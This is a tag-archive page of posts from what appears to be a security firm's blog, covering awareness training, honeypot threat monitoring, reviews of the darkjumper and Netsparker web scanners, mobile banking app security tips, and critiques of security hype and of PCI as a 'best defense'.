Tag Archives: security

2 Ways to Get the Most Out of Security Awareness Training

Posted on by
Reply

A good security training and awareness program is one of, if not the most important part of any effective information security program. After all, people are the ones that cause security problems in the first place and, ultimately, people are the ones that have to deal with them. Not to mention the fact that people are twice as likely to detect security problems and breaches as any automated system. Doesn’t it make sense that you should do everything in your power to ensure that all of your people are behind you in your security efforts? That they are provided with the knowledge and the tools they need to understand information security and what their responsibilities are towards it? That they are aware of how devastating an information security incident can be to the company, and consequently, how devastating it can be to them personally? Well, you’re not going to get that from having them read the policy book as new hires and then hold a two hour class six or twelve months later!

And that is traditionally how information security is dealt with in most companies. All enthusiasm for the process is absent, too. They don’t want to do this training! It costs them time and money! The only reason most companies provide any security training outside of the very basics is because of their need to comply with some regulation or another. So what you end up with is a whole group of undertrained and unenthusiastic employees. And these employees become, in turn, the very kind of security liabilities that you are trying to avoid in the first place! So why not turn them into security assets instead? You have to provide them with some security training anyway, so why not give it that extra little “oomph” you need to make it worth your while to do?

How do you go about that you may ask? Here are some tips:

    1. Make sure that they understand what an information security incident or anomaly looks like. Make sure that they know all about social engineering techniques and how Malware is spread. Give them some tips on how to recognize bogus websites, phishing emails and bogus phone calls. Let them know some of the things they can expect to see if there is a virus present on their machines. And don’t use just one format to provide them with this information. Use every method you can think of! There are many formats for security and awareness training to choose from. Group assemblies with speakers and PowerPoint presentations, lunch and learns, training days, self directed web based learning, directed webinars, security documents, email reminders, posters and pamphlets, podcasts, departmental meetings, discussion groups and many more. And make sure that management personnel, especially top management personnel, make it clear how important this task is and how much it means to them and the company. Without this support, your efforts will go nowhere.

    2. Give your people incentives that make them want to participate in the information security program. One method is to simply ask for their help. Make sure your employees understand how important the participation of each and every one of them is to the effort. People often respond very favorably to such requests. Whereas if they are simply told that they must do it, they are much more likely to be unconcerned and uncooperative. Another way is to provide them with rewards for active participation in the program. Put the names of employees who have reported security issues in a hat and have a monthly drawing for a prize or a day off. Give these people a free lunch. Give them the best parking spot in the lot for a month. I’m sure you can think of a dozen other ways to reward your employees for participating in the program. Or simply post the picture of the employee on a bulletin board or internal web page or recognize their accomplishments at group meetings. Everybody really likes to be recognized for doing a good job!

The whole idea is to turn your personnel into “net cops”. If you can do that, you can turn your own people into the best IDS system there is, and for a lot less money than you would spend on machines or hosted services…or for cleaning up a security incident!

Using Honeypots to Track Attackers: Eric Romang’s FileAve.com Report

Posted on by
Reply

One of MSI’s Twitter friends, Eric Romang, recently wrote a deep dive about PHP RFI attacks that used the fileave.com service. The write-up was based on a large set of honeypot data that dates back several years!

The data is interesting and compelling and goes a long way to show value derived from the use of honeypots to track attackers and reveal information and trends about their behaviors. Check out this article here.

We were quite impressed with the data visualizations and are excited to see the level of effort put forth. Thanks for the dedication and hard work! We hope that, you, our readers, enjoy pointers to great data like this.

Have you seen or done other honeypot research or visualizations on your networks and threats? If you care to share tips, results or the like, drop us a line below in the comments or via Twitter (@lbhuston, @mrmaguire). We would love to hear more about them!

As always, thanks for reading!

An Explanation of Our HoneyPoint Internet Threat Monitoring Environment #HITME #security

Posted on by
Reply

One of the least understood parts of MicroSolved is how the HoneyPoint Internet Threat Monitoring Environment (#HITME) data is used to better protect our customers. The engineers have asked me to drop this line into the newsletter and give you a “bees knees” perspective of how it works! First, if you don’t know about the #HITME, it is a set of deployed HoneyPoints that gather real world, real time attacker data from around the Internet. The sensors gather attack sources, frequency, targeting information, vulnerability patterns, exploits, malware and other crucial event data for the technical team at MSI to analyze. You can even follow the real time updates of attacker IPs and target ports on Twitter by following @honeypoint or the #HITME hash tag. MSI licenses that data under Creative Commons, non-commercial for FREE as a public service to the security community.

That said, how does the #HITME help MSI better protect their customers? Well, first, it allows folks to use the #HITME feed of known attacker IPs in a blacklist to block known scanners at their borders. This prevents the scanning tools and malware probes from ever reaching you to start with. Next, the data from the #HITME is analyzed daily and the newest, bleeding edge attack signatures get added to the MSI assessment platform. That means that customers with ongoing assessments and vulnerability management services from MSI get continually tested against the most current forms of attack being used on the Internet. The #HITME data also gets updated into the MSI pen-testing and risk assessment methodologies, focusing our testing on real world attack patterns much more than vendors who rely on typical scanning tools and back-dated threats from their last “yearly bootcamp”.

The #HITME data even flows back to the software vendors through a variety of means. MSI shares new attacks and possible vulnerabilities with the vendors, plus, open source projects targeted by attackers. Often MSI teaches those developers about the vulnerability, the possibilities for mitigation, and how to perform secure coding techniques like proper input validation. The data from the #HITME is used to provide the attack metrics and pattern information that MSI presents in its public speaking, “State of the Threat,” the blog, and other educational efforts. Lastly, but certainly not least, MSI provides an ongoing alerting function for organizations whose machines are compromised. MSI contacts critical infrastructure organizations whose machines turn up in the #HITME data and works with them to mitigate the compromise and manage the threat. These data-centric services are provided, pro-bono, in 99% of all of the cases!

If your organization would be interested in donating an Internet facing system to the #HITME project to further these goals, please contact your account executive. Our hope is that the next time you hear about the #HITME, you’ll get a smile on your face knowing that the members of my hive are working hard day and night to protect MSI customers and the world at large. You can count on us, we’ve got your back! 

Review of darkjumper v5.7

Posted on by
2

In continuing our research and experimentation with PHP and the threat of Remote File Inclusion (RFI), our team has been seeking out and testing various tools that have been made available to help identify web sites that are vulnerable to RFI during our penetration tests. Because we’re constantly finding more tools to add to the list, we’ve started the evaluation this week with the release of darkjumper v5.7. This python tool prides itself on being cross platform, and at first glance, seems rather easy to use. After downloading the tarball and extracting the files, simply calling the script from the command line brings it to life.

Running again with the –help or -h switches will print the options to the menu. This tool has several helpful options that could help expedite the discovery of various attack vectors against the web site. The injection switch incorporates a full barrage of SQLi and blind SQLi attempts against every web site identified on the target server. We did not use this option for this evaluation but intend to thoroughly test it in the future.

Using the inclusion switch will test for both local file inclusion (LFI) and RFI, again on every website identified on the target. This is our main focus for the evaluation since we’ve seen an incredible number of RFI attacks in the recent HITME data from around the globe. Selection of the full switch will attack the target server with the previously mentioned checks, in addition to scanning cgi directories, user enumeration, port scanning, header snatching, and several other possibly useful options. While a full review of this tool will be written eventually, we’re focusing on the RFI capabilities this time, so we’re using this test only against our test target. The test appears quite comprehensive. Another seemingly useful function of this tool is its ability to discover virtual hosts the live on the target server. After a short wait, darkjumper works it’s magic and spits out several files with various information for us to review. After pouring through these files, our team was disappointed to realize that there were URLs that pointed to this server which seem to have been missed by the tools scans. Even more disappointing is the fact that of the 12 target sites identified by the tool, none were the target that we had suspected of being vulnerable to RFI.

File inclusion is a real threat in the wild today. We are seeing newly vulnerable and compromised hosts on a regular basis from the HITME data, and seeing that Apache ships with a default configuration that is vulnerable to these attacks and the fact that PHP is inherently insecure, makes the battle even more intense. It is absolutely critical in this environment that we are hardening our servers before bringing them online. Those of us developing our web applications are validating every bit of information that is submitted to us by our users! Allowing our servers to execute code from an unknown source is one of the most popular attack vectors today from SQL injection, to XSS and XSRF, to RFI. The Internet continues to be a digital equivalent to the wild, wild west, where outlaws abound. There is no guarantee that the users who interface with our sites are who they say they are or that they have the best of intentions. It is up to us to control how our applications and servers are handling this data.

How Cloud Computing Will Leak Into Your Enterprise

Posted on by
1

“Consumer use of the cloud”; in a phrase, is how the cloud will leak into your enterprise, whether you like it or not. Already, IT is struggling with how to manage the consumer use of devices and services in the enterprise. Skype/VoIP and WIFI were the warning shots, but the BlackBerry, iPhone, iPad and other consumer devices are the death nail for centralized IT (and IS) control.

Consumer electronics, backed by a wide array of free or low cost cloud services, are a new frontier for your organization. Services like MobileMe, DropBox, various file sharing tools and remote access services like GoToMyPC, et al. have arrived. Likely, they are in use in your environment today. Consumers use and leverage these services as a part of their increasingly de-centralized online life. Even with sites like Twitter and FaceBook growing in capability and attention, consumers grow their use, both personally and professionally of services “in the cloud”. Make no mistake, despite your controls at the corporate firewalls, consumers are using their mobile and pocket devices and a variety of these services. Unless you are searching them at the door and blocking cell phone use in your business, they are there.

This might not be “the cloud” that your server admins are worrying about. It might not represent all of the off-site system, database and other hosting tools they are focused on right now, but make no mistake, this consumer version of the cloud has all, if not more, of the same issues and concerns. Questions about your data is managed, secured and maintained all abound.

Given the “gadget posture” of most organizations and their user communities, this is not likely to be something that technical controls can adequately respond to. The consumer cloud services are too dynamic and widespread for black listing approaches to contain them. Plus, they obviously lack centralized choke points like in the old days of “network perimeter security”. The new solution, however, is familiar. Organizations must embrace policies and processes to cover these technologies and their issues. They also have to embrace education and awareness training around these topics with their user base. Those who think that denial and black listing can solve this problem are gravely mistaken. The backdoor cloud consumer movement into your organization is already present, strong and embedded. Teaching users to be focused on safe use of these services will hopefully reduce your risk, and theirs.

Three Tips for Banking App Dev for Mobile Devices

Posted on by
Reply

Lately, we have been looking at a lot of banking apps and front ends for the iPhone, Android and other mobile devices in the lab. Our testing thus far has shown some great results and it seems like a lot of banks, credit unions and other financial institutions are interested in having an “app” for their customers and members. Many of these apps are well designed, deep and rich. Many are simply canned front ends to existing web page content and functionality. A few are just plain horrible.

Here are three tips for organizations to keep in mind when coding their banking and financial apps for the mobile devices.

1. The mobile devices are not PCs. The apps should be light weight, clean and easy to use. Usability is tied to security in this case, because of errors. If your app has tiny little buttons with confusing text, no confirmation dialogs and lacks other basic usability features then you make it easier for users to make mistakes, create bad transactions, get confused and other issues would could constitute a risk for your business and your users. Don’t design for a PC monitor. Make sure your designs are usable on the appropriate size screens and with appropriate space for human digits.

2. Don’t allow users to store their credentials in the app or its underlying data structures. Many mobile phones and such remain woefully unsecured. Even where the vendor has provided for basic security controls for the devices, many users do not use them. Plan ahead for this. The app has to be convenient, but it shouldn’t let the users place undo risk on themselves. If you allow them to store logins, or even a digital certificate, make sure they can’t also store at least 1-2 other pieces of credentials between uses. If someone just picks up their device, they should NOT have access to the users accounts.

3. This goes without saying, but don’t forget encryption. Just because an application uses the cell network, does not mean that you don’t need SSL. (I’m looking at you two developer groups in the last 90 days, you know who you are.) No matter the network, protect your transactions and data streams with strong crypto. The mobile devices can handle it. They can do enough lifting to handle SSL or they shouldn’t be running a banking app. Like Nike says, “Just Do It!”

There you have it. Three basic ways that you can help increase the safety and capability of your financial services app on the iPhone, iPad and other mobile platforms. If you have done these three basics, then you are off to a start. The next crucial step is to get your app and the back-end processes checked via a risk assessment and security test. Give us a call if you need assistance or want us to drop it into our testing lab process. We are seeing quite a few of these days.

Piracy as a Crimeware Defense

Posted on by
3

So, just a quick thought on this one. What if we, as security folks, made a serious endeavor to reduce the earning capability of those who create crimeware, spyware and other malware? What if we did to them exactly what the gaming companies and MPAA have been saying is killing their business? What if every time we saw a piece of “licensed” crimeware tool, we cracked it and published keygens and other cracks for it?

Sure, in the mid-term there would be more attackers able to use the malware. But, what if, in the longer term, less malware were actually created? What if the bar went up to the point where publishing these tools was no longer profitable? Would the numbers and evolution of malware be slowed?

I am asking, not because I have an answer in mind, but because I am curious. At what point does striking at the root of the profitability of criminals reduce their efforts and capabilities? Anyone with ideas or experience in this line of thought, please leave a comment below. Thanks for reading and I look forward to your responses.

Fox Hypes Consumers on Cyber Security

Posted on by
Reply

This has to be one of the worst, most FUD-filled articles I have seen yet on cyber security.

http://www.foxnews.com/scitech/2010/06/03/ways-your-home-susceptible-hackers-cybersecurity/

In the article, many vulnerabilities and threats are discussed, but the article fails to lay out any sense of real risk based on probability or likely damages. In other words, here is a bunch of the over the top crap to scare you about using technology.

I think this kind of stuff is exactly why consumers have grown palliative to security threats and keeping their machines patched. The media loves to whip the fear and hype on them routinely, yet common sense tells us innately that the sky can’t always be falling, or it would have fallen by now. Humans are incapable of existing at high levels of threat sensory overload for long periods of time. We just weren’t wired for it. Our sense of risk becomes irrational with too frequent and infrequent use.

Please, talk to people who ask about this stuff with a well-placed sense of risk. Explain that security issues exist in a variety of platforms, but the average person needs not fear every security problem. They need to base their decisions and actions on real world probability and damage calculations and NOT on hype by vendors, the media or interested parties.

I don’t know about you, but I’m not too worried about someone HERFing my stereo. It would work, likely, but the odds of someone caring enough to do it, having access and capability, seem pretty small. I’m not planning on tempesting the house any time soon, and neither should you.

What We Love About Netsparker

Posted on by
Reply

Netsparker Professional Edition, by Mavituna Security, is a web application scanner focused on finding unknown flaws in your applications. It can find a wide range of vulnerabilities including SQL injection, cross-site scripting, local and remote file inclusion, command injection and more.

Installation of the software was easy, and as Mavituna Security touts, the license is non-obtrusive. Starting the application you are presented with a nice well designed gui, that shows quite a lot of information. To start a scan, it can be as simple as just putting in a URL. It is very easy for non-security professionals to setup and use. There are also profiles you can configure and save. It’s possible to configure a form login through a very well designed wizard.

The main draw of Netsparker is the confirmation engine, which is how Netsparker claims to be false positive free. The confirmation engine takes the vulnerability and actually confirms that it’s exploitable. If it’s exploitable, it’s definitely not a false positive. A neat feature of identified SQL injection vulnerabilities is the ability for Netsparker to allow you to exploit them right through the scanner. You can run SQL queries, or even open a shell (depending on DB and configuration of it). Directory traversal vulnerabilities can be exploited to download the whole source of the application since Netsparker already knows all the files, and other system files can also be retrieved and saved through the interface.

We set Netsparker to scan our Web application lab which contains known vulnerabilities that cover the OWASP Top Ten Project. We noticed that Netsparker did a very good job at spidering and finding a high number of attack surfaces. On vulnerabilities, Netsparker did a great job of finding SQL injections, cross site scripting, and directory traversals. On one vulnerability, I thought I may have made Netsparker report a confirmed false positive, but it turns out I was wrong after I used the built in query maker and ran one and got data back.

Overall I think Netsparker is an excellent tool, especially effective at finding SQL injections and cross-site issues. Of course, I wouldn’t say it was the only scanner you should have, but definitely consider adding it to your repertoire.

The Media Makes PCI Compliance “Best Defense”?

Posted on by
Reply

I have seen a lot of hype in my day, but this one is pretty much — not funny. Below is a link to a mainstream media trade magazine for the hospitality industry in which the claim that PCI compliance is the “best defense” hotels and the like can have against attackers and data theft.

Link: http://is.gd/cgoTz

Now, I agree that hospitality folks should be PCI complaint, since they meet the requirements by taking credit cards, but setting PCI DSS as the goal is horrible enough. Making PCI out to be the “best defense” is pretty ridiculous.

PCI DSS and other standards are called security BASELINES for a reason. That is, they are the base of a good security program. They are the MINIMUM set of practices deemed to be acceptable to protect information. However, there is, in most all cases, a severe gap between the minimum requirements for protecting data and what I would quantify as the “best defense”. There are so many gaps between PCI DSS as a baseline and “best defense” that it would take pages and pages to enumerate. As an initial stab, just consider these items from our 80/20 approach to infosec left out of PCI: Formalized risk assessment (unless you count the SAQ or the work of the QSA), data flow modeling for data other than credit card information, threat modeling, egress controls, awareness, incident response team formation and even skills gap/training for your security team.

My main problem with PCI is not the DSS itself, but how it is quickly becoming the goal for organizations instead of the starting line. When you set minimums and enforce them with a hammer, they quickly come to be viewed as the be-all, end-all of the process and the point at which the pain goes away so you can focus on other things. This is a very dangerous position, indeed. Partial security is very costly and, at least in my opinion, doing the minimum is pretty far away from being the “best defense”.